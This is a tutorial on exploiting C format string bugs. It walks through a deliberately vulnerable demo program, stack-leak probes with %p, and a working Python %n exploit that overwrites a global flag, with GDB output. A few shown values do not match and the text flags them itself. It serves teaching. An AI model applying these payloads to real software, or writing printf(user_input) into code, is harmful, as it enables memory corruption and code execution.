A format string defines the way in which data will be represented when printed. For instance, the following C code will output the current year:
```c
printf("This year is: %d\n", 2019);
```
If the format string passed to printf is itself derived from user input, for example printf(buffer) instead of printf("%s", buffer), the program has a format string vulnerability.
Exploiting the vulnerability lets an attacker read arbitrary memory locations, which assists further memory corruption attacks by undermining the effectiveness of ASLR.
In addition, an attacker may be able to write to arbitrary memory locations and achieve code execution.
The code listing below shows an application that is vulnerable to format string exploitation.
```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int security_flag;

void victory()
{
    printf("Security check passed!\n");
}

void failure()
{
    printf("Security check failed!\n");
}

void get_password()
{
    security_flag = 0;
    char buffer[512];

    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);

    if (security_flag > 1)
    {
        victory();
    }
    else
    {
        failure();
    }

    exit(1);
}

int main(int argc, char **argv)
{
    get_password();
}
```
Reading Memory Locations
The “%p” conversion specifier prints its corresponding argument as a pointer value. If the format string contains more conversion specifiers than printf was given arguments, printf reads the missing arguments from whatever follows on the stack and prints those values instead.
```
./format_string_demo
AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
AAAA-0x1f4-0xb7fcc5a0-0xb7ff212a-0x8-0xb7ff2116-0xb7fff000-0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d
Security check failed!
```
The example above shows stack memory being printed in response to the “%p” specifiers. The “AAAA” characters we entered appear as the seventh value, in hexadecimal (0x41414141), which shows that the input buffer itself sits on the stack and is reachable as a printf argument.
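The probing step can also be scripted. The sketch below uses two hypothetical helpers, `build_probe` and `find_marker_position` (neither is part of the original program), to build the `AAAA-%p-...` input and report which argument position echoes the marker. It assumes a 32-bit little-endian target, a four-character marker, and glibc-style `%p` output, where a null pointer prints as `(nil)`.

```python
import struct


def build_probe(marker="AAAA", count=11):
    """Return a probe string: the marker followed by `count` %p specifiers."""
    return "-".join([marker] + ["%p"] * count)


def find_marker_position(leak, marker="AAAA"):
    """Return the 1-based position of the leaked word equal to the marker, or None."""
    # The four marker bytes are read back as one little-endian 32-bit word.
    target = struct.unpack("<I", marker.encode("ascii"))[0]
    fields = leak.strip().split("-")[1:]  # drop the echoed marker itself
    for position, field in enumerate(fields, start=1):
        value = 0 if field == "(nil)" else int(field, 16)
        if value == target:
            return position
    return None


# Output copied from the session shown above.
leak = ("AAAA-0x1f4-0xb7fcc5a0-0xb7ff212a-0x8-0xb7ff2116-0xb7fff000-"
        "0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d")
print(build_probe())
print(find_marker_position(leak))      # 7
print(struct.pack("<I", 0x2d70252d))   # b'-%p-'
```

For the output shown earlier this reports position 7. The words that follow the marker decode to fragments of the format string itself (`-%p-` and so on), which is consistent with the buffer living on the stack.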
Writing to Memory
While the above behavior is interesting, to subvert the application logic and reach the victory function we need to change the “security_flag” variable to a value greater than 1. This can be achieved using the “%n” conversion specifier. Instead of printing anything, “%n” stores the number of characters written so far into the integer pointed to by its corresponding argument.
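To make the behavior of “%n” concrete, here is a toy Python model of printf. It is only a sketch and not how libc is implemented: `toy_printf` is a made-up name, it handles only `%d`, `%p`, `%n` and `%%`, and the `memory` dictionary is a stand-in for process memory.

```python
def toy_printf(fmt, args, memory):
    """Toy model of printf supporting only %d, %p, %n and %%.

    `memory` is a dict standing in for process memory (address -> int).
    Returns the text that would have been printed.
    """
    out = []
    written = 0              # characters emitted so far
    remaining = iter(args)   # each conversion consumes the next argument
    i = 0
    while i < len(fmt):
        if fmt[i] != "%":
            out.append(fmt[i])
            written += 1
            i += 1
            continue
        if i + 1 >= len(fmt):
            raise ValueError("dangling % at end of format")
        spec = fmt[i + 1]
        i += 2
        if spec == "n":
            # %n prints nothing: it stores the running count at the
            # address taken from the argument list.
            memory[next(remaining)] = written
            continue
        if spec == "%":
            text = "%"
        elif spec == "d":
            text = str(next(remaining))
        elif spec == "p":
            text = hex(next(remaining))
        else:
            raise ValueError("unsupported conversion: %" + spec)
        out.append(text)
        written += len(text)
    return "".join(out)


memory = {}
print(toy_printf("hello%n world", [0x804a048], memory))  # hello world
print(memory[0x804a048])                                 # 5
```

Five characters precede “%n” in the format, so the model stores 5 at the supplied address. In the real attack the address is not passed by the programmer but taken from attacker-controlled stack contents.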
First, we need to find the address of the security_flag variable. We can do this using GDB:
```
(gdb) break main
Breakpoint 1 at 0x804859b
(gdb) run
Starting program: /home/user/format_string_demo
Breakpoint 1, 0x0804859b in main ()
(gdb) p &security_flag
$1 = (<data variable, no debug info> *) 0x804a048 <security_flag>
```
So, we know we need to write a value greater than 1 to the address 0x804a048.
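```python
#!/usr/bin/python
import struct
import sys

buf = b''
buf += struct.pack('<I', 0x804a048)  # address of security_flag, little-endian
buf += b'%p' * 3                     # three conversions consume the arguments before %n
buf += b'%n'                         # store the character count via the next argument
# Write raw bytes so the address is not re-encoded (works on Python 2 and 3).
getattr(sys.stdout, 'buffer', sys.stdout).write(buf + b'\n')
```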
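The exploit above first packs the address we wish to write to, then uses three %p specifiers to consume the arguments that precede it on the stack. The %n specifier then stores the number of characters printed so far, including the four address bytes, at the address taken from the next argument, which is the one we packed at the start of the buffer.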
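A slightly more defensive variant of the script is sketched below. `build_payload` is a hypothetical helper, not part of the original exploit. It assumes a 32-bit little-endian target and rejects addresses containing a NUL or newline byte, since printf stops parsing the format string at a NUL and fgets stops reading after a newline.

```python
import struct


def build_payload(address, leading_conversions=3, conversion=b"%p"):
    """Return address + N conversions + %n as raw bytes (no trailing newline)."""
    packed = struct.pack("<I", address)  # 32-bit little-endian
    if b"\x00" in packed or b"\n" in packed:
        raise ValueError("address contains a NUL or newline byte")
    return packed + conversion * leading_conversions + b"%n"


payload = build_payload(0x804a048)
print(payload)  # b'H\xa0\x04\x08%p%p%p%n'
```

The first packed byte, 0x48, is the ASCII character H, so the program's output for this payload begins with an H followed by three unprintable bytes.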
We can run the script and redirect its output to a file:
```
python exploit.py > out
```
Then load the target executable in GDB and set a breakpoint on the call to exit at the end of the get_password function:
```
(gdb) disassemble get_password
Dump of assembler code for function get_password:
   0x080484ed <+0>:     push   %ebp
   0x080484ee <+1>:     mov    %esp,%ebp
   0x080484f0 <+3>:     sub    $0x208,%esp
   0x080484f6 <+9>:     movl   $0x0,0x804a048
   0x08048500 <+19>:    mov    0x804a040,%eax
   0x08048505 <+24>:    sub    $0x4,%esp
   0x08048508 <+27>:    push   %eax
   0x08048509 <+28>:    push   $0x200
   0x0804850e <+33>:    lea    -0x208(%ebp),%eax
   0x08048514 <+39>:    push   %eax
   0x08048515 <+40>:    call   0x8048370 <fgets@plt>
   0x0804851a <+45>:    add    $0x10,%esp
   0x0804851d <+48>:    sub    $0xc,%esp
   0x08048520 <+51>:    lea    -0x208(%ebp),%eax
   0x08048526 <+57>:    push   %eax
   0x08048527 <+58>:    call   0x8048360 <printf@plt>
   0x0804852c <+63>:    add    $0x10,%esp
   0x0804852f <+66>:    mov    0x804a048,%eax
   0x08048534 <+71>:    cmp    $0x1,%eax
   0x08048537 <+74>:    jle    0x8048540 <get_password+83>
   0x08048539 <+76>:    call   0x80484bb <victory>
   0x0804853e <+81>:    jmp    0x8048545 <get_password+88>
   0x08048540 <+83>:    call   0x80484d4 <failure>
   0x08048545 <+88>:    sub    $0xc,%esp
   0x08048548 <+91>:    push   $0x1
   0x0804854a <+93>:    call   0x8048390 <exit@plt>
End of assembler dump.
(gdb) break * 0x0804854a
Breakpoint 1 at 0x804854a
```
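The disassembly also explains why three conversions precede %n. The sketch below redoes the stack arithmetic in Python, assuming the 32-bit cdecl convention visible in the listing, where printf's arguments are 4-byte words on the stack. The variable names are illustrative only.

```python
WORD = 4  # bytes per stack slot on 32-bit x86

# Offsets are relative to %ebp, read from the listing above.
buffer_offset = -0x208               # lea -0x208(%ebp),%eax
esp_after_fgets_cleanup = -0x208     # after "add $0x10,%esp" at +45
# "sub $0xc,%esp" then "push %eax" places the format pointer here:
format_pointer_offset = esp_after_fgets_cleanup - 0xc - WORD

# printf looks for its first variadic argument just above the format pointer.
first_vararg_offset = format_pointer_offset + WORD

# 1-based index of the variadic argument slot that overlaps buffer[0:4].
buffer_position = (buffer_offset - first_vararg_offset) // WORD + 1
print(buffer_position)  # 4
```

Three conversions consume the slots below the buffer, so the fourth, %n, takes its pointer from the first four bytes of the input. The earlier %p listing, where the marker showed up in the seventh position, appears to come from a differently compiled build.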
Next, run the application and evaluate the contents of the security_flag variable:
```
(gdb) run < out
Starting program: /home/user/format_string_demo < out
H51230867961923086950698
Security check passed!

Breakpoint 1, 0x0804854a in get_password ()
(gdb) p/s security_flag
$2 = 27
```
The security check passes because printf wrote the value 27 to the security_flag address: the 4 address bytes plus the 23 digits printed before %n was reached.
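The figure 27 can be reproduced with a short calculation. This sketch assumes the digit run in the output splits into the three words 512, 3086796192 and 3086950698 (0x200, 0xb7fcc5a0 and 0xb7ff212a), printed in decimal. That split is a reading of the output, not something the session states. The same words rendered with %p as 0x-prefixed hex would come to 29 characters, which suggests the run shown used a decimal conversion such as %u.

```python
import struct

address_bytes = struct.pack("<I", 0x804a048)   # 4 bytes, printed verbatim
leaked_words = [512, 3086796192, 3086950698]   # assumed split of the digit run

# Characters emitted before %n when the words are printed in decimal.
decimal_count = len(address_bytes) + sum(len(str(w)) for w in leaked_words)
# Characters emitted if the same words were printed as 0x-prefixed hex.
pointer_count = len(address_bytes) + sum(len(hex(w)) for w in leaked_words)

print(decimal_count)  # 27
print(pointer_count)  # 29
```

Either count is greater than 1, so both variants satisfy the check in get_password.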